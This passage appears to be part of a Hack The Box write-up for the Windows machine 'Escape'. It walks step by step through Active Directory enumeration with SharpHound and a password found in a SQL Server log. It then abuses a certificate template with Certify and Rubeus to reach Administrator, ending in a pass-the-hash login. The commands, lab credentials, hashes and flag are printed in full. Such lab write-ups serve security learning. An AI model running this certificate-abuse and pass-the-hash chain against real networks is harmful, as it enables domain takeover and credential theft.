KB4512577 Security Update S-1-5-21-89493159-3068390195-4120627384-1047 2019-09-06 - 17:24:38
KB5020866 Update 1600-12-31 - 16:00:00
KB4514366 Update 1600-12-31 - 16:00:00
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? | VULN |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes and |
| | check whether a patch was applied in the last 31 |
| | days. |
[*] Found 1 result(s).
HotFixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB5011551 Update NT AUTHORITYSYSTEM 2023-02-02 - 13:18:08
[...]
+------+------------------------------------------------+------+
| TEST | MISC > OS Version | INFO |
+------+------------------------------------------------+------+
| DESC | Print the detailed version number of the Operating |
| | System. If we can't get the update history, this |
| | might be useful. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Name Version
---- -------
Windows Server 2019 Standard 10.0.17763 Version 1809 (17763.2746)
[...]
We get to a point where the use of classic windows tools becomes essential, let’s try bloodhound.
BloodHoundADI collect the necessary information…
*Evil-WinRM* PS C:Userssql_svc> upload ./attack/upld/SharpHound.exe ../sh.exe
Info: Uploading ./attack/upld/SharpHound.exe to ../sh.exe
Data: 1402196 bytes of 1402196 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:Userssql_svc> ./sh.exe -c All --zipfilename output.zip
2023-03-25T23:50:54.5149380-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-03-25T23:50:54.6555838-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:54.6868023-07:00|INFORMATION|Initializing SharpHound at 11:50 PM on 3/25/2023
2023-03-25T23:50:55.0305487-07:00|INFORMATION|Loaded cache with stats: 56 ID to type mappings.
56 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-03-25T23:50:55.0461913-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:55.1868496-07:00|INFORMATION|Beginning LDAP search for sequel.htb
2023-03-25T23:50:55.2336792-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-03-25T23:50:55.2336792-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-03-25T23:51:25.2383915-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-03-25T23:51:39.5292927-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-03-25T23:51:39.5605157-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Status: 97 objects finished (+97 2.204545)/s -- Using 42 MB RAM
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Enumeration finished in 00:00:44.4448376
2023-03-25T23:51:39.7011650-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings.
56 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-03-25T23:51:39.7167826-07:00|INFORMATION|SharpHound Enumeration Completed at 11:51 PM on 3/25/2023! Happy Graphing!
*Evil-WinRM* PS C:Userssql_svc> download ./20230325235139_output.zip ./attack/dwnl/20230325235139_output.zip
Info: Downloading ./20230325235139_output.zip to ./attack/dwnl/20230325235139_output.zip
Info: Download successful!
*Evil-WinRM* PS C:Userssql_svc>
…and analyze the result.
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ xhost +local:$(id -nu)
non-network local connections being added to access control list
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo docker run -it
-p 7474:7474
-p 7687:7687
-e DISPLAY=unix$DISPLAY
-v /tmp/.X11-unix:/tmp/.X11-unix
--device=/dev/dri:/dev/dri
-v ~/temp:/data
--network host
--name bloodhound belane/bloodhound
WARNING: Published ports are discarded when using host network mode
Selecting JVM - Version:11.0.16+8-post-Debian-1deb11u1, Name:OpenJDK 64-Bit Server VM, Vendor:Debian
Changed password for user 'neo4j'. IMPORTANT: this change will only take effect if performed before the database is started for the first time.
Directories in use:
home: /var/lib/neo4j
config: /etc/neo4j
logs: /var/log/neo4j
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
licenses: /var/lib/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:84). It is available at http://localhost:7474
There may be a short delay until the server is ready.
*** Log in with bolt://127.0.0.1:7687 (neo4j:blood) ***
I use the containerized version, so wait for the availability of the Neo4j.
When logged in, upload the collected data (directly zip file).
Now, on the search box, search for the user you pawn: sql_svc.
Select it and mark the user as owned.
Search for the Ryan user account and select it, right-click and chose “shortest path from owned to here“
Well, the path is long enough, but the tool crashes as soon as you try to investigate the third link. Nonetheless, the information from previous nodes highlights standard attacks that I’ve faced in the past. Let’s try them quickly.
S1ckB0y1337Again, however, nothing seems to emerge. The commands you run seem to throw an error while generating the security object; another hole in the water.
I’m starting to feel this dead end approaching, but I still have some resources, let’s try some exploits suggester for Windows.
AonCyberLabs*Evil-WinRM* PS C:Userssql_svcDocuments> systeminfo > systeminfo.txt
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo > systeminfo.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ systeminfo > systeminfo.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Once again blocked even before starting. Next another.
bitsadmin*Evil-WinRM* PS C:Userssql_svcDocuments> cscript.exe missingkbs.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
Windows Exploit Suggester: Missing KBs Identifier v1.0
https://github.com/bitsadmin/wesng/
cscript.exe : [-] This script needs to be executed as an elevated Administrator
+ CategoryInfo : NotSpecified: ([-] This script...d Administrator:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Exhausted and out of ideas, I abandon my goal for a few days (needless to tell us, when you slam too much on the same apparently unsolvable problem, disconnect… let your mind refresh, empty and face the problem again).
As you can see, I was stubborn in the search for an advanced exploit and my belief that the resolution depended on it did not take my eyes off a dead end in which I was closed for several days. But sometimes simplicity and banality are the most improbable and unexpected ways.
So I go back to the machine after a few days and with the memories of all the attempts tried up to that moment, I go back to having a look at the resources available from the shell. I then find a folder on the root containing what appears to be the SQL Server installation package and a couple of other directories one of which contains a backup file.
*Evil-WinRM* PS C:sqlserver> dir -force
Directory: C:sqlserver
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:sqlserver> cd logs
*Evil-WinRM* PS C:sqlserverlogs> dir -force
Directory: C:sqlserverlogs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
I start sifting through the log file and find two consecutive failed accesses within a few…. hundredths of a second (it seems a bit exaggerated to me, but we’ll stick to the clues).
*Evil-WinRM* PS C:sqlserverlogs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
[...]
2022-11-18 13:43:07.44 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htbRyan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
[...]
All we have to do is reconnect with Evil-WinRM using the new credentials.
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.202 - Escape (win)/attack/upld/sggstr]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> cd ..desktop
*Evil-WinRM* PS C:UsersRyan.Cooperdesktop> dir
Directory: C:UsersRyan.Cooperdesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/1/2023 4:23 PM 34 user.txt
*Evil-WinRM* PS C:UsersRyan.Cooperdesktop> type user.txt
f******************************5
And the first flag is captured. Ok, at this point the steps repeat as before. Unfortunately also in this case, nothing with winPEAS, nothing with BloodHound, nothing with PowerScript and Rubeus; another dead end.
As exhausted, I rely on the suggestions of the forum and thus discover a new (for me) interesting tool: “just download the Certify.exe“.
GhostPackIt looks really interesting, let’s see what comes out.
*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
________|_| __|_|_| __, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htbsequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTINAdministrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITYAuthenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTINAdministrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htbsequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelDomain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequelAdministrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequelAdministrator S-1-5-21-4078382237-1492182817-2568127209-500
sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequelAdministrator S-1-5-21-4078382237-1492182817-2568127209-500
sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequelAdministrator S-1-5-21-4078382237-1492182817-2568127209-500
sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.2338568
As in the example given in the git repository documentation, our user also seems to be enabled for the ManageCA privilege (but what a coincidence). Go on.
*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Certify.exe request /ca:dc.sequel.htbsequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
________|_| __|_|_| __, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : sequelRyan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htbsequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 12
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvG6vT+UG9HVxfQllC9sDCLkgIe2yUKOCnLEhaQXtDnjyqtik
k/afDQlLoFFzrtRSkkVEdad8FTv0Jp/k0jggUemH32mTkFncol1eMyFJC4HCHmGc
[...]
2fyAvkVl6e0kkDoE4XFqX4FnVTlnC6RlR9xzlaeJRkZEzCzhPqAI1tahkcV9JOU9
ZxtxrK8ZgGYY9lXCH2kXZ76NEAvnaY167v6EmNyKWo2Yh1X9V8A=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAxRrpFSnZZtuQAAAAAADDANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
[...]
it7yHBHqFb0JX/RS/++fW1VN+oI5ZX0juicCdqvON7i1s1kTth7dkfa7Ae3sm3SU
exO2srhH7p4l/Z6l8mwODDbCnantdw==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:13.3681079
Create the pfx key from the recovered certificate.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/cert]
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/cert]
└─$ ls -la
total 16
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Apr 5 17:48 .
drwxr-xr-x 6 in7rud3r in7rud3r 4096 Apr 5 17:46 ..
-rw-r--r-- 1 in7rud3r in7rud3r 3842 Apr 5 17:47 cert.pem
-rw------- 1 in7rud3r in7rud3r 3409 Apr 5 17:48 cert.pfx
And we ask for the resolution of the TGT key.
*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx
______ _
(_____ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ | ___ | | | |/___)
| | | |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.2
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htbAdministrator'
[*] Using domain controller: fe80::a477:436e:5730:3595%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBEnvQzQSZedn
[...]
BwMFAADhAAClERgPMjAyMzA0MDYwNTUxNDVaphEYDzIwMjMwNDA2MTU1MTQ1WqcRGA8yMDIzMDQxMzA1
NTE0NVqoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 4/5/2023 10:51:45 PM
EndTime : 4/6/2023 8:51:45 AM
RenewTill : 4/12/2023 10:51:45 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : xXtPDJD44N/LDDFDSZt7lQ==
ASREP (key) : 25425F5D4ED1042512BFC036C6A94862
There are two different ways to obtain the hash password (that I know), using ccache…
Hackplayers…or generating it from Rubeus itself; let me use the simplest method.
*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
______ _
(_____ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ | ___ | | | |/___)
| | | |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.2
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htbAdministrator'
[*] Using domain controller: fe80::a477:436e:5730:3595%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBBbDT2EbXfI1
[...]
BwMFAADhAAClERgPMjAyMzA0MDYwNjE0MTNaphEYDzIwMjMwNDA2MTYxNDEzWqcRGA8yMDIzMDQxMzA2
MTQxM1qoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 4/5/2023 11:14:13 PM
EndTime : 4/6/2023 9:14:13 AM
RenewTill : 4/12/2023 11:14:13 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : xiXbj5e7f3J3Xv2+WDcN7A==
ASREP (key) : C877552CA622B1DC65D65CC9007546E9
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
And we run straight to the root flag without delay, once again exploiting the potential of Evil-WinRM.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/--==## DONE ##==--]
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersAdministratorDocuments> whoami
sequeladministrator
*Evil-WinRM* PS C:UsersAdministratorDocuments> type ../Desktop/root.txt
b4c008685abf917ffbf974fddb917a8a
*Evil-WinRM* PS C:UsersAdministratorDocuments>
And once again… that’s all folks, I sweated for a few days, but in the end, I managed to overcome every obstacle (even the most trivial ones, next time, look around before proceeding down the most impervious routes). For the moment, goodbye, but I’ll wait for you at the next BOX, happy hacking everyone!
Secjuice – Read More